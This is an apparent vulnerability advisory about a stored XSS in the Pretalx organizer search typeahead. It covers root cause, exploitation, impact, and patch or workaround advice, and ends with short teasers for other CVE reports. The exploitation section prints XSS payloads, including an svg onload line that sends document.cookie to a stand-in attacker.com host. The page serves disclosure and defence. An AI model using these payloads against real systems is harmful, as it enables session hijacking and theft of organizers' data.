CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-CJCX-JFP2-F7M2

GHSA-CJCX-JFP2-F7M2: High-Severity Stored XSS in Pretalx Organizer Search Interface

Amit Schendel
Amit Schendel
Senior Security Researcher

Apr 19, 2026·5 min read·15 visits

Executive Summary (TL;DR)

A stored XSS vulnerability in the Pretalx search typeahead feature allows low-privileged users to execute arbitrary JavaScript in the context of administrative organizer accounts, enabling session hijacking and unauthorized administrative actions.

Pretalx versions prior to 2026.1.0 contain a high-severity stored Cross-Site Scripting (XSS) vulnerability within the organizer-facing search interface. Low-privileged users, such as speakers or proposal submitters, can inject malicious JavaScript into their profiles or submissions. When an organizer searches for these records, the application insecurely renders the results using `innerHTML`, leading to arbitrary script execution in the organizer's browser.

Vulnerability Overview

Pretalx is an open-source conference planning tool that provides platforms for call for papers (CfP), schedule management, and speaker communication. The platform defines distinct privilege levels, separating unprivileged submitters or speakers from highly privileged conference organizers and administrators. The organizer interface includes a typeahead search functionality designed to quickly locate submissions, speaker profiles, and user accounts.

The vulnerability, tracked as GHSA-CJCX-JFP2-F7M2, is a Stored Cross-Site Scripting (XSS) flaw located in this organizer search feature. It occurs because the frontend application fails to properly sanitize user-supplied data before rendering it in the DOM. This constitutes a CWE-79 violation: Improper Neutralization of Input During Web Page Generation.

By exploiting this vulnerability, an attacker with minimal privileges can store a malicious payload within standard application fields, such as their display name or submission title. When a privileged organizer interacts with the search bar and the attacker's record is returned as a match, the malicious payload executes automatically within the organizer's session context.

Root Cause Analysis

The root cause of this vulnerability lies in the frontend JavaScript component responsible for rendering search results in the backend interface. Specifically, the flaw is located within src/pretalx/static/orga/js/base.js. This script handles the asynchronous typeahead search feature utilized by conference organizers.

When an organizer types a query, the frontend queries a backend endpoint to retrieve matching user names, emails, speaker display names, and submission titles. The frontend script iterates through the JSON response and constructs DOM elements for the dropdown menu. During this process, the script insecurely uses the innerHTML property to insert the returned text strings directly into the DOM.

The use of innerHTML for displaying untrusted data forces the browser's HTML parser to evaluate the provided string. Any HTML tags, including <script> or event handlers like onerror on an <img> tag, are executed. The backend API does not enforce strict HTML encoding on these specific fields before returning them to the frontend, relying entirely on the frontend to handle rendering securely.

Exploitation Methodology

Exploitation requires the attacker to possess an account on the target Pretalx instance, which is generally open to the public during a Call for Papers phase. The attacker logs in and creates a new proposal or updates their user profile. During this step, the attacker injects a standard XSS vector into a targeted field, such as the Submission Title.

A typical payload looks like <img src=x onerror=alert(document.cookie)> or <svg onload=fetch('https://attacker.com/?cookie='+document.cookie)>. The backend database successfully stores this payload without modification. The attacker then waits for an organizer to utilize the backend search function. The payload is entirely passive until triggered by the victim.

When the organizer types a substring that matches the attacker's manipulated record, the API returns the malicious payload in the search results. The vulnerable JavaScript in base.js writes this payload to the DOM via innerHTML. The browser immediately parses the injected HTML, encounters the error or load event, and executes the embedded JavaScript within the origin of the Pretalx application.

Impact Assessment

The CVSS v3.1 vector for this vulnerability is CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N, resulting in a base score of 8.7 (High). The impact is severe due to the privilege disparity between the attacker and the likely victim. The vulnerability facilitates horizontal to vertical privilege escalation through session riding.

Once the payload executes, the attacker's script operates with the full privileges of the organizer's active session. The script can read any data accessible to the organizer, including sensitive reviewer notes, private speaker details, and financial data related to the conference. This data can be exfiltrated silently to an external server controlled by the attacker.

Furthermore, the script can issue arbitrary HTTP requests to the Pretalx backend on behalf of the organizer. Since the script runs within the same origin, it can read the application's CSRF token from the DOM and include it in POST requests. This allows the attacker to automate administrative actions, such as modifying the event schedule, deleting submissions, altering system configurations, or granting administrative access to the attacker's account.

Remediation and Mitigation

The primary remediation for this vulnerability is to upgrade the Pretalx installation to version 2026.1.0 or later. The patch modifies src/pretalx/static/orga/js/base.js to eliminate the use of innerHTML. By replacing innerHTML with textContent or innerText, the browser correctly interprets the user input as raw text rather than executable markup.

If immediate patching is not feasible, administrators can apply a manual mitigation. Operators can edit src/pretalx/static/orga/js/base.js directly on their server to swap the vulnerable DOM manipulation methods for secure text-node assignments. After making this change, the collectstatic management command must be executed to ensure the updated asset is served to clients.

As a temporary operational workaround, conference organizers can be instructed to avoid using the backend search bar entirely. While this degrades the usability of the administrative interface, it eliminates the execution trigger for the payload. Additionally, ensuring that session cookies are flagged with the HttpOnly attribute prevents the XSS payload from directly reading the session identifier via document.cookie.

Technical Appendix

CVSS Score
8.7/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Affected Systems

Pretalx (Organizer Backend Interface)

Affected Versions Detail

Product
Affected Versions
Fixed Version
pretalx
pretalx
< 2026.1.02026.1.0
AttributeDetail
Vulnerability TypeStored Cross-Site Scripting (XSS)
CWE IDCWE-79
CVSS Score8.7 (High)
Attack VectorNetwork
Privileges RequiredLow (Submitter/Speaker)
User InteractionRequired (Organizer must search)
Exploit StatusProof of Concept Available

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.007Command and Scripting Interpreter: JavaScript
Execution
CWE-79
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Vulnerability Timeline

Vulnerability published on the GitHub Advisory Database
2026-04-18
Pretalx v2026.1.0 released with patch
2026-04-18

References & Sources

  • [1]GitHub Advisory: GHSA-CJCX-JFP2-F7M2
  • [2]OSV Record
  • [3]Project Repository
  • [4]Official Security Support

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 11 hours ago•GHSA-8RQH-VXPR-X77P
4.3

GHSA-8RQH-VXPR-X77P: Stored Cross-Site Scripting via MIME Type Spoofing in Plone REST API

A stored Cross-Site Scripting (XSS) vulnerability exists within plone.restapi, the REST API package for Plone content management system. By supplying a spoofed input MIME type (text/x-html-safe), an attacker can mislead the rendering layer (plone.app.textfield) into assuming that the supplied content is already sanitized. This causes the system to skip the safe_html transform, allowing arbitrary JavaScript to execute in the victim's browser when they view the compromised page.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 12 hours ago•CVE-2026-11400
8.0

CVE-2026-11400: Privilege Escalation via Untrusted Search Path in AWS Advanced JDBC Wrapper

An untrusted search path vulnerability in the GlobalDatabasePlugin component of the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL allows authenticated, low-privilege database users to hijack administrative session queries. By defining a custom function in a writable schema such as the public schema, an attacker can hijack queries executed automatically during driver-level topology detection. When a highly privileged database user connects to the database utilizing an affected version of the wrapper, the custom function executes under their security context, enabling remote privilege escalation to rds_superuser.

Alon Barad
Alon Barad
7 views•6 min read
•about 13 hours ago•CVE-2026-27771
8.2

CVE-2026-27771: Authentication Bypass and Information Disclosure in Gitea Container and Composer Registries

CVE-2026-27771 represents a critical security flaw in Gitea and Forgejo (up to and including version 1.26.1) involving missing authorization checks (CWE-862). Unauthenticated remote attackers can query, enumerate, and download private container images from the OCI-compliant container registry. Additionally, unauthorized users can retrieve private or internal source repository URLs via the Composer package registry metadata API. A public proof-of-concept exists, and threat metrics indicate highly active scanning and exploitation risks.

Alon Barad
Alon Barad
7 views•7 min read
•about 14 hours ago•GHSA-CVPC-HCCG-WMW4
8.8

GHSA-CVPC-HCCG-WMW4: Missing Authorization in Formie Administrative Settings Allows Privilege Escalation

A missing authorization vulnerability in the Formie plugin for Craft CMS prior to version 3.1.28 allows low-privileged Control Panel users to read and modify sensitive administrative settings, configuration options, and third-party integrations.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 15 hours ago•CVE-2026-53598
7.5

CVE-2026-53598: Arbitrary File Read via File Reference Expansion in Microsoft Prompty

CVE-2026-53598 is a directory traversal and arbitrary file read vulnerability in Microsoft Prompty ecosystem loaders across multiple languages. Prior to version 2.0.0-beta.2, the loaders resolved `${file:...}` reference strings inside frontmatter configuration blocks without enforcing that the target file paths resided within authorized directories. This deficiency allows an attacker-controlled configuration file to read sensitive operating system and application files through absolute paths, directory traversal, or symbolic link escapes. The issue is addressed across the Python, C#, Node.js/TypeScript, and Rust ecosystems.

Amit Schendel
Amit Schendel
7 views•6 min read
•about 16 hours ago•GHSA-MFR4-MQ8W-VMG6
7.3

GHSA-MFR4-MQ8W-VMG6: Path Traversal in proot-distro copy Command Allows Container Escape

A directory traversal vulnerability exists in the copy subcommand of the proot-distro utility. Due to incomplete path sanitization, local attackers or malicious scripts can read from or write to arbitrary files outside the container rootfs, bypassing isolation barriers and potentially gaining unauthorized access or persistent execution on the host system.

Alon Barad
Alon Barad
7 views•7 min read